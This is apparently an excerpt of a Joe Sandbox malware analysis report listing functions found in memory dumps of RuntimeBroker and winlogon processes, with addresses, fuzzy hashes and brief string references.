Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F31710 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction ID: 5bc7c4da91ff6c26ad301ba0e77786e6d619d87ea03a1c8e7e788281d9814829
Opcode Fuzzy Hash: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction Fuzzy Hash: 90E0ED30E1D9068EEA647328848567471D59F44394FB88776F01CCA1E5EB2DECC6D609

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3BEDE Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f3a000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f04f2779dc15e9edc6559c982889914b692a47402aa9b05ce8a8a289afef7063
Instruction ID: 2832567355cb9dce1c978f6e21db8d2c54ce3da714f24b4ba47fdd066b00880a
Opcode Fuzzy Hash: f04f2779dc15e9edc6559c982889914b692a47402aa9b05ce8a8a289afef7063
Instruction Fuzzy Hash: 21D0E235A1892D8ECF40EB98D8441ECB3B4FB58340F000022D40DD7280CB2068108B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F351AE Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction ID: c1d9cc1d6f359149bdcb91d6d0ce9ca71c99aad859e6254a91b6e80a4aaa0493
Opcode Fuzzy Hash: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction Fuzzy Hash: 95E02670D19A1D8EEBF5EB088C50BB9B6B1BB58642F5000EBC00DE2280DF342AC09F04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3B32B Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f3a000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70367b2b6ef51d3d61b644d43846e52a1385d726f03513c09bcdc274b1dec3e7
Instruction ID: 2022ee7184206e1fc363b501f972d3f04417e49ca5f3d4decea4cf7b90d6e0b3
Opcode Fuzzy Hash: 70367b2b6ef51d3d61b644d43846e52a1385d726f03513c09bcdc274b1dec3e7
Instruction Fuzzy Hash: DED05E30C1D54A9EDB91F710C851AE9B7B0EF15340F1042E3800DC2282CF38AAC08F44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F30FA5 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b96030a49c133a61c2e327acea06ba15a8726ae1193ea91afe516d1d58453aa1
Instruction ID: c3a45408b52db0e30afd0f694dd2c18fdf9b5538ff35d93ba2fb7c370526f7bd
Opcode Fuzzy Hash: b96030a49c133a61c2e327acea06ba15a8726ae1193ea91afe516d1d58453aa1
Instruction Fuzzy Hash: F4E0EC30D1A5199EE750FB14C851BAEAAB1FF44344F5001B6D40DA32C6CF386E408F54

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F38EA7 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 487edb672a762525586fd55eb3a7895dc7cc08b8751fd058bf0e3449a35b2169
Instruction ID: d7798922c64e1049268846843d25c10c71a04ff2289e4e58ff5047e35b16cc1b
Opcode Fuzzy Hash: 487edb672a762525586fd55eb3a7895dc7cc08b8751fd058bf0e3449a35b2169
Instruction Fuzzy Hash: 45D06C70A09A298EEBA4EB0488547AAB261FB48242F1005EB840DE72D1EF742A808F04

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF848F41001 Relevance: 7.6, Strings: 6, Instructions: 131COMMON

Download Yara Rule

Strings

[, xrefs: 00007FF848F412E4
{, xrefs: 00007FF848F41001
/, xrefs: 00007FF848F41870
&, xrefs: 00007FF848F41A12
", xrefs: 00007FF848F41A67
", xrefs: 00007FF848F4129E

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f41000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: "$"$&$/$[${
API String ID: 0-683516320
Opcode ID: 76e8b2553306c7a762bf02d96e58d16827ac713ada0203a758630aacac3eafb9
Instruction ID: a5b54852b088992f98e88108acdc8ef2438739d9b6af1783b65c1c495fa9e745
Opcode Fuzzy Hash: 76e8b2553306c7a762bf02d96e58d16827ac713ada0203a758630aacac3eafb9
Instruction Fuzzy Hash: 6A51C570D082298FEB68EF95D8947FDB6B1AF54745F1040BAD05EA72C1CB385984DF14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4199B Relevance: 5.1, Strings: 4, Instructions: 76COMMON

Download Yara Rule

Strings

/, xrefs: 00007FF848F41870
&, xrefs: 00007FF848F41A12
", xrefs: 00007FF848F41A67
}, xrefs: 00007FF848F419DF

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f41000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: "$&$/$}
API String ID: 0-3572482012
Opcode ID: c0b9440c54c56e73e76cde5c4196e37fb96f94aa2c2bcbc44ecf7b88862913c3
Instruction ID: 841c9695c48c9098fe46eab5e093ce06d607ca991424aca0264536a6107f800c
Opcode Fuzzy Hash: c0b9440c54c56e73e76cde5c4196e37fb96f94aa2c2bcbc44ecf7b88862913c3
Instruction Fuzzy Hash: E831B074D182298FDBA8EF54C8947BDB7B1FB64741F1045AAD04AA72D0DB386A84CF44

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: winlogon.exePID: 7176, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F3139C Relevance: 3.8, Strings: 3, Instructions: 76COMMON

Download Yara Rule

Strings

., xrefs: 00007FF848F315CA
", xrefs: 00007FF848F31602
/, xrefs: 00007FF848F31870

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f31000_winlogon.jbxd

Similarity

API ID:
String ID: "$.$/
API String ID: 0-983106565
Opcode ID: a8eb0aa1350bea6f037b2b26a52cfe87caea6df20c20e1ebc695d1664b594f6a
Instruction ID: 2c3df7c0c5fac9fb0a4024741ebdcffd37ba4a6480979d87b6f41783dc503109
Opcode Fuzzy Hash: a8eb0aa1350bea6f037b2b26a52cfe87caea6df20c20e1ebc695d1664b594f6a
Instruction Fuzzy Hash: 5E31D230D086598FEBA8EF54C8987EDB3B1FB54341F1045AAD41AAA2D1CB78A984CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2D9C9 Relevance: 2.9, Strings: 2, Instructions: 400COMMON

Download Yara Rule

Strings

NH, xrefs: 00007FF848F2DA74
p\H, xrefs: 00007FF848F2DAE2

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f2d000_winlogon.jbxd

Similarity

API ID:
String ID: NH$p\H
API String ID: 0-1232786254
Opcode ID: eb4ac676e29d164c677fd0130434036f5a0007ff91ab7f94b6b83c0aec62fd14
Instruction ID: 787b957fdd1ce4b30b313269cec9a5541fd4e176d2d45fd54ea18970aa5919a3
Opcode Fuzzy Hash: eb4ac676e29d164c677fd0130434036f5a0007ff91ab7f94b6b83c0aec62fd14
Instruction Fuzzy Hash: 99E13731D19A5D8FEB98EB68D4A57B8B7B1FF58341F0401BAD009E72D2CB396884CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F20A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

(vH, xrefs: 00007FF848F20A70

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID: (vH
API String ID: 0-1172161155
Opcode ID: d8f9f8761bea3a839f8d7ed7a9eabfa481c7e8edcacd3d449974061807ab6359
Instruction ID: 39879854b6e84d174e3f21dadfe2312b4c7f22597e1a0054ad3d1465edc56581
Opcode Fuzzy Hash: d8f9f8761bea3a839f8d7ed7a9eabfa481c7e8edcacd3d449974061807ab6359
Instruction Fuzzy Hash: 19115B32D0854E9FE780FB68D8492B97BA0FF98380F8405B6D808C6196EF39A5448B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2118D Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F211FD

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: e767a72399af6827ed62908f8e43f397686144fb80d700ace42b1fbe5598b1de
Instruction ID: 5bc146f343fdb91cdfbf680fb8865c25435eeb6fe2fe53f1c4a541a6d2634dca
Opcode Fuzzy Hash: e767a72399af6827ed62908f8e43f397686144fb80d700ace42b1fbe5598b1de
Instruction Fuzzy Hash: E611C171D0D64A4EEB59EBA498692B97BE4FF69341F1404BED01AC60C2EF3A6584C708

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F211A0 Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F211FD

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 343806ddacc0faf0db624dd1aca6e4d78101da1c7341effdde1f21ccaecdf304
Instruction ID: adaa800259c4fda3e785a9717d800a049cb45e9e0315913fd882fb65216013cd
Opcode Fuzzy Hash: 343806ddacc0faf0db624dd1aca6e4d78101da1c7341effdde1f21ccaecdf304
Instruction Fuzzy Hash: A8F0F671D1DA4E8EFB58FBA4A8193FA7AE8FF55345F00043AE41AC60C1EF3925948649

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F332E4 Relevance: .4, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f31000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6dc783a5f3c0b34600392b91894e7506e8c9e1f3a0e093b8c2c725852258e98
Instruction ID: dbb623fbbb112d3f6edbf9b3dbcdcc939414090a4b11fb87aafd9bfef59689b3
Opcode Fuzzy Hash: d6dc783a5f3c0b34600392b91894e7506e8c9e1f3a0e093b8c2c725852258e98
Instruction Fuzzy Hash: 2A012C7190E6CA9FE792A77858562A97FB0EF16240F0904F7D488D70D3DA2869488356

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3382F Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f31000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fd7351a17888f95896f67490b15d0129ebd360ddee8ad76b6cb25a843ebe3a6
Instruction ID: d948456f5190d874552efc53684ac1415f2e948aa2d4362725f9524b9cedd7dd
Opcode Fuzzy Hash: 3fd7351a17888f95896f67490b15d0129ebd360ddee8ad76b6cb25a843ebe3a6
Instruction Fuzzy Hash: 3F811927B1E4699AD700BBBCB8555FA7B60EF463B6F044377D189CE083DE286046C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F216A8 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a5c2150f0b7d55f4c77da201018cc7040057b434896a127f42e2277b3cedb14
Instruction ID: 53238f7e6b1e8fb90de9ec97d97112cf13ac621c42b603bddbac678aa03f50db
Opcode Fuzzy Hash: 2a5c2150f0b7d55f4c77da201018cc7040057b434896a127f42e2277b3cedb14
Instruction Fuzzy Hash: 2D91AC31A0CA8A8FDB59EF58A8515B977E2FF98754F14017AD44DC32C2CE35B842C789

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F32A87 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f31000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf444af90e76b2f550071c7d1121edafa7fd58f4953c315a6bc8220ca7871c30
Instruction ID: 28af4b7dba0fd29c6feee002b7aa50f3ba5a85d3b7b31b57646a3d61e21cf4a5
Opcode Fuzzy Hash: bf444af90e76b2f550071c7d1121edafa7fd58f4953c315a6bc8220ca7871c30
Instruction Fuzzy Hash: 1B91D474D1861D8EEBA4EB98D855BECBBB1FF58340F5042AAD00DE3292DF3469848F44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F235FE Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b9c3e8e1ff64909ecaf4bb7f22d77a31a5d8d71da9b4981535395d7e3f35083
Instruction ID: 716b71dea3e531d5c87efaf829723e682d5625f4a3d1e605de2fe2beda05fadc
Opcode Fuzzy Hash: 4b9c3e8e1ff64909ecaf4bb7f22d77a31a5d8d71da9b4981535395d7e3f35083
Instruction Fuzzy Hash: E1719071E1994E8FE794EB6CE8157A9BFE1FB99350F94027AC00DC72D6DFA918018701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F21C6D Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2190d35f930a1ef0d647cff247795910559993caeae45ba3e3fa5f11d17a508
Instruction ID: f0311d55294df3263fb9cb6bfcd7cb71a8e9b4ce9bbf6388cb5a7d1a6ec062e5
Opcode Fuzzy Hash: b2190d35f930a1ef0d647cff247795910559993caeae45ba3e3fa5f11d17a508
Instruction Fuzzy Hash: B251BF31A0CA898FDB48EF5898955BA77E2FF98754F14017ED44AC32C1CF35A8428789

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F231C1 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beb6249e970cc3202ec90607232d9dbf17e02856a040ae21c05d9d9c2f89ab6e
Instruction ID: 82714bfdb04d349564bd145b942a42ad6c0c7c2ff8e11127d378c0ee6b65316b
Opcode Fuzzy Hash: beb6249e970cc3202ec90607232d9dbf17e02856a040ae21c05d9d9c2f89ab6e
Instruction Fuzzy Hash: 7C5105B0D0860D8FEB54EB98E4986EDBBB1FF48340F50407AD409E72E2DB39A945CB15

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F22085 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86538b5debf566b263fd12c861bc162ebc6798ab444a9b996495844be72f94f7
Instruction ID: 748a2371b31075003b93030a75c68626d2ccec0e21232ca73dfaf60739bb3c75
Opcode Fuzzy Hash: 86538b5debf566b263fd12c861bc162ebc6798ab444a9b996495844be72f94f7
Instruction Fuzzy Hash: D5416531E0DA4A4FE355EB78A8451B9FBE0EF8A390F0509BBD04CC31E2DF29A8418355

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F328DC Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f31000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67fd02ea23c5c0262a7531327fce9ea7b8628e895cbbf21ec21fd66629a21a42
Instruction ID: cc9246b3e54546c158a5fde41763f58651d2baaa3945d2cf53747f628004f8a5
Opcode Fuzzy Hash: 67fd02ea23c5c0262a7531327fce9ea7b8628e895cbbf21ec21fd66629a21a42
Instruction Fuzzy Hash: CF41E574D0861D8FEB94EF58D884BA8BBB1FF59341F4042AAD40DE3292DF346984DB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3267D Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f31000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70652a98c6dba6d4cce4ea030be82f4f5758f667c6f899b95ff163c45979fac8
Instruction ID: aa5e81131c4ddbf257dd88e2b1de42ed11854b00ab28abb3314aaa9a29f117bf
Opcode Fuzzy Hash: 70652a98c6dba6d4cce4ea030be82f4f5758f667c6f899b95ff163c45979fac8
Instruction Fuzzy Hash: C9416D30E2965D9FEB44EBA8D855AEEB7B1FF58301F50057AE009E3292DF396940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2AE88 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f2a000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdabe921fff16a8ae5175014a3a2982aeba28a8f4a487ca96c257dd54639cbef
Instruction ID: a2ce5133a064090aceb8163c865f1fe3a7b4695ae485c6572305a05b2841f83b
Opcode Fuzzy Hash: fdabe921fff16a8ae5175014a3a2982aeba28a8f4a487ca96c257dd54639cbef
Instruction Fuzzy Hash: C831ED72D0DA9B8FE701AB78A8190F9BBE0FF15380F0804BAC45DC71D2EF29A5958355

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2BD69 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f2a000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f8ed5e7897d5a26e113ad2c2ad71ecb421cde89e91aa561a1cf40f8bb84e266
Instruction ID: dc4787c86cc82f67799ff81b926abd219eb695e1bab6be02d675c325691cdf1f
Opcode Fuzzy Hash: 1f8ed5e7897d5a26e113ad2c2ad71ecb421cde89e91aa561a1cf40f8bb84e266
Instruction Fuzzy Hash: FB315270D1DA498FEB54EFA4D8946EDBBF1EF09300F14017AD409E3292DB38A9408B99

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F339D3 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f31000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19d839f9f28cfc22d7038bf5d65f479711a6fa9b3cde69a541ae939b34db1ef5
Instruction ID: 0a343fd371189166d153c19ed7e4cd13db0c525ba1873354b5d0126788268243
Opcode Fuzzy Hash: 19d839f9f28cfc22d7038bf5d65f479711a6fa9b3cde69a541ae939b34db1ef5
Instruction Fuzzy Hash: C6212336E0E58A8EEB11FB6CBC192FABFA0FF42365F4402B7C148CA192DE2840048354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F232F5 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4db477e77b2e75bcfb105f252ebe5a96809f6aabf0c847c90ec126f02deb2bf
Instruction ID: d2df8f278cb99f964bcf06fa3545ef66eedd9684d044ffa1b3b1ab894d6d34cd
Opcode Fuzzy Hash: e4db477e77b2e75bcfb105f252ebe5a96809f6aabf0c847c90ec126f02deb2bf
Instruction Fuzzy Hash: 9F21F370D0891D8FEB94EB98D494AECBBF1FF58340F60406AD009E72E2CB396980DB14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F233CF Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c77580d9e88cfd40d16d025b69b68d1e92e2ee19642ba280c5613a446e4edcb
Instruction ID: f24aa4bafad83707f3942e2afcb269489e72d1d1e84b851aa43deba2031bde28
Opcode Fuzzy Hash: 7c77580d9e88cfd40d16d025b69b68d1e92e2ee19642ba280c5613a446e4edcb
Instruction Fuzzy Hash: 0E219D7084D68A8FD743AB7888586A97FF0FF16340F0904FAD049CB0B2EB399555C712

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F21F39 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 596e4a2ddd5c614a87b054d0522caf6391feb577c4932319d4ed6c9057e369ab
Instruction ID: 77a0e225355ea68218cc2fa2ba8c03869d95f9feb10226c0723acea52ac8f966
Opcode Fuzzy Hash: 596e4a2ddd5c614a87b054d0522caf6391feb577c4932319d4ed6c9057e369ab
Instruction Fuzzy Hash: C2115E2180E2D15EEB2367B828650616F945F03264F2D46FBD0E8CB0E3D60E6889C30A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F33109 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f31000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d41cca10a1a55d72482d7677f609f87328963b8d738032a310e70fcdc0b9a037
Instruction ID: 869047441a993841cd9d6924cd2202003e528b0ba30a967a3fceb6298457fdef
Opcode Fuzzy Hash: d41cca10a1a55d72482d7677f609f87328963b8d738032a310e70fcdc0b9a037
Instruction Fuzzy Hash: 6921B430C0E68A9FE743FB6898596AA7FF0FF5A340F0805FBD448C70A2DA289544C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F323E1 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f31000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2a9f876fbf7c1c68cafa5ca98aa1529f71f18795b45b3283b59da6b341f8b9d
Instruction ID: 24491e1930f01402b9ecb19593e6ce1909954d86b53a9ef0eb76a35b0523aa10
Opcode Fuzzy Hash: a2a9f876fbf7c1c68cafa5ca98aa1529f71f18795b45b3283b59da6b341f8b9d
Instruction Fuzzy Hash: 5B11BB7091C6898FDB49EF28C4961E97BE1FF58345F0102BEE80AC3292CB35A450CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F34675 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f31000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b16f5ab1a4bcf7b342df7ed7edf49357a8d1da47e2ce9458301d149c327507a
Instruction ID: 3cfec26c32263251272d0cd1a7ac4e450c20bf88129cee40faaf7f8e0fbf8189
Opcode Fuzzy Hash: 4b16f5ab1a4bcf7b342df7ed7edf49357a8d1da47e2ce9458301d149c327507a
Instruction Fuzzy Hash: C4116D3090DA4E9FDB89EF6884592B9BBA0FF68341F0405BBD409C65D6EB35A580CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F345D9 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f31000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0260247c6aa3103d3d0b96d66e8d30ae71e165b51167799a09a2d9935f82fe43
Instruction ID: 5cd5196a60809892313e9e44627ca5a2552272774363d801a1ee2df68873be74
Opcode Fuzzy Hash: 0260247c6aa3103d3d0b96d66e8d30ae71e165b51167799a09a2d9935f82fe43
Instruction Fuzzy Hash: 88218E3080D68A9FDB89EF6884592BDBBA0FF69341F0405BBD419C71E2DB38A580CB41

Uniqueness

Uniqueness Score: -1.00%

